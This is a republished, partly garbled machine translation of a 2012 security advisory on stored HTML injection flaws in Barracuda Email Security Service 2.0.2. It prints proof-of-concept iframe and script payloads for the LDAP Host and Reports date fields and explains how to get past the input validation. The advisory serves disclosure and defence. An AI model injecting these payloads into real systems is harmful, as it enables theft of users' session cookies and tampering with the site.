Multiple HTML injection vulnerabilities in Barracuda Email Security Service

Source: Internet
Author: User
Tags ldap host barracuda email

Release date: 2012-08-02
Updated on:

Affected Systems:
Barracuda Networks Email Security Service 2.0.2
Barracuda Networks Email Security Service
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54773

Barracuda Email Security Service is a cloud-based Email Security Service.

Barracuda Email Security Service 2.0.2 and other versions have multiple HTML Injection Vulnerabilities. Attackers can exploit these vulnerabilities to inject malicious HTML and script code, attackers can steal Cookie authentication creden。 or control the appearance of the site.

<* Source: Benjamin Kunz Mejri
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Benjamin Kunz Mejri () provides the following test methods:


Proof of Concept:
========================
1.1
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce...

Review: Domain Settings> Directory Services> LDAP Host

<Div id = "directory-services" class = "module">
<H4 class = "module-title"> Directory Services <Div class = "module-content">
<Div class = "warn notice" id = "ldap-test-result" style = ""> Alt = "loading... "> Connecting to>" <iframe src = "http://www.example1.com"> @ gmail.com> "<script> alert (document. cookie) </script> <div style = "1@gmail.com 0 </iframe> </div>
<Div style = "float: right;">
<A href = "https://www.example2.com/domains/sync_ldap/4" class = "btn"> <span> Synchronize Now </span> </a>
<A href = "#" class = "btn" id = "ldap-test-btn"> <span> Test Settings </span> </ a>
</Div>
<P class = "field">
<Label class = "label" for = "ldap_host"> LDAP Host: </label>
<Input name = "ldap_host" id = "ldap_host" size = "30" value = ">
<Iframe src = http://www.example1.com> @ gmail.com> "<script> alert (document. cookie) </script> <
Div style = "1@gmail.com 0" type = "text">

URL: https://www.example.com/domains/info/4

PoC:> ">" <iframe src = http://www.example1.com> VL> "<div style =" 1> ">"

Note:
To bypass the validation close the tag of the exception handling on beginning with double quotes 2 times.
The mask of the exception (> ") will be bypassed and the string will be executed out of the secure exception handling message.

 

1.2
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce...

Vulnerable Module: Reports> Date Start> Date End

PoC: & gt; & quot; <iframe src = http://www.example1.com>

URL: https://www.example.com/reports

Note:
1. Include a start Date & End Date
2. Inject after the start date & end date your own persistent script code
3. Result: The script code get executed out of the date listing application context
4. Save value with script code to events for exploitation via module.

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Barracuda Networks
------------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.barracudanetworks.com/ns/products/spam_overview.php

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.